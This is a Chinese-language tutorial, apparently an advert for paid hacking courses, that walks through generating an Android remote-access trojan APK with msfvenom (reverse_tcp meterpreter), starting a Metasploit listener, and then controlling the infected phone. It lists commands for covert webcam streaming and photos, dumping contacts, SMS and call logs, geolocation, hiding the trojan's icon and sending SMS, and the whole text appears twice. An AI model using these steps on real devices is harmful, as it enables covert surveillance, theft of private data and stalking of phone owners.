2023年6月21日发(作者:)
使⽤Kali的metasploit⽣成安卓APK⽊马控制安卓⼿机使⽤Kali的metasploit⽣成安卓APK⽊马控制安卓⼿机前提:在虚拟机⾥⾯安装kali系统,再就是本机安装⼀个夜神模拟器,和⼀个安卓5的环境如果不会的话,可以报名跟我们学习,联系⽅式
第⼀步:在终端输⼊ip addr命令查看kali主机的IP地址ip addr我的kali主机IP地址为192.168.2.146 每个⼈的不⼀样,灵活运⽤
第⼆步,输⼊⽣成反弹⽊马命令:msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.2.146 lport=55555 R > /home/注意了,命令ip地址必须跟你⾃⼰的kali主机IP地址保持⼀致
然后在kali系统的根路径的home⽂件夹下⾯会出现⼀个apk⽂件,把虚拟机kali系统⾥⾯的这个apk⽂件复制到本机,然后拖到夜神模拟器⾥⾯安装并且运⾏。
第三步:启动msfconsole,配置相关参数msfconsole //启动msfconsoleuse exploit/multi/handler //加载模块set payload android/meterpreter/reverse_tcp //选择Payloadset lhost 192.168.2.146 //这⾥的地址设置成我们刚才⽣成⽊马的IP地址set lport 55555exploit //开始执⾏漏洞 开始监听,等待⼿机上线
第四步:点⼀下夜神模拟器上⾯的MainActivity程序(即安卓远控⽊马),我们会在kali⾥⾯发现有主机上线了。
第五步:使⽤各种命令开始操控⼿机,那我们都可以做些什么呢?5.1查看⼿机信息sysinfo
5.2查看⼿机有多少个摄像头webcam_list
5.3开启摄像头webcam_stream
然后在kali系统中打开这个html⽂件,即可在线实时监控摄像头画⾯
5.4导出电话号码dump_contacts
5.5导出短信信息dump_sms5.6通过摄像头拍照功能webcam_snap5.X其他命令⼤全send_sms //从⽬标会话发送短消息webcam_snap //隐秘拍照功能webcam_snap //从指定的摄像头获取快照check_root //检查设备是否有根hide_app_icon //隐藏⼿机端⽊马程序图标dump_calllog //获取通话记录geolocate //获取⼿机的当前的经纬度set_audio_mode //Set Ringer Modesqlite_query //Query a SQLite database from storagewakelock // Enable/Disable Wakelockwlan_geolocate // Get current lat-long using WLAN informationapp_install // Request to install apk fileapp_list // List installed apps in the deviceapp_run // Start Main Activty for package nameapp_uninstall //Request to uninstall application
后记:如果还是学不懂,可以报名参加培训班,联系⽅式这⼀节只是最简单的⽤法,还有更⾼级的frp穿透,开机⾃启,安卓免杀等内容教学。
2023年6月21日发(作者:)
使⽤Kali的metasploit⽣成安卓APK⽊马控制安卓⼿机使⽤Kali的metasploit⽣成安卓APK⽊马控制安卓⼿机前提:在虚拟机⾥⾯安装kali系统,再就是本机安装⼀个夜神模拟器,和⼀个安卓5的环境如果不会的话,可以报名跟我们学习,联系⽅式
第⼀步:在终端输⼊ip addr命令查看kali主机的IP地址ip addr我的kali主机IP地址为192.168.2.146 每个⼈的不⼀样,灵活运⽤
第⼆步,输⼊⽣成反弹⽊马命令:msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.2.146 lport=55555 R > /home/注意了,命令ip地址必须跟你⾃⼰的kali主机IP地址保持⼀致
然后在kali系统的根路径的home⽂件夹下⾯会出现⼀个apk⽂件,把虚拟机kali系统⾥⾯的这个apk⽂件复制到本机,然后拖到夜神模拟器⾥⾯安装并且运⾏。
第三步:启动msfconsole,配置相关参数msfconsole //启动msfconsoleuse exploit/multi/handler //加载模块set payload android/meterpreter/reverse_tcp //选择Payloadset lhost 192.168.2.146 //这⾥的地址设置成我们刚才⽣成⽊马的IP地址set lport 55555exploit //开始执⾏漏洞 开始监听,等待⼿机上线
第四步:点⼀下夜神模拟器上⾯的MainActivity程序(即安卓远控⽊马),我们会在kali⾥⾯发现有主机上线了。
第五步:使⽤各种命令开始操控⼿机,那我们都可以做些什么呢?5.1查看⼿机信息sysinfo
5.2查看⼿机有多少个摄像头webcam_list
5.3开启摄像头webcam_stream
然后在kali系统中打开这个html⽂件,即可在线实时监控摄像头画⾯
5.4导出电话号码dump_contacts
5.5导出短信信息dump_sms5.6通过摄像头拍照功能webcam_snap5.X其他命令⼤全send_sms //从⽬标会话发送短消息webcam_snap //隐秘拍照功能webcam_snap //从指定的摄像头获取快照check_root //检查设备是否有根hide_app_icon //隐藏⼿机端⽊马程序图标dump_calllog //获取通话记录geolocate //获取⼿机的当前的经纬度set_audio_mode //Set Ringer Modesqlite_query //Query a SQLite database from storagewakelock // Enable/Disable Wakelockwlan_geolocate // Get current lat-long using WLAN informationapp_install // Request to install apk fileapp_list // List installed apps in the deviceapp_run // Start Main Activty for package nameapp_uninstall //Request to uninstall application
后记:如果还是学不懂,可以报名参加培训班,联系⽅式这⼀节只是最简单的⽤法,还有更⾼级的frp穿透,开机⾃启,安卓免杀等内容教学。
发布评论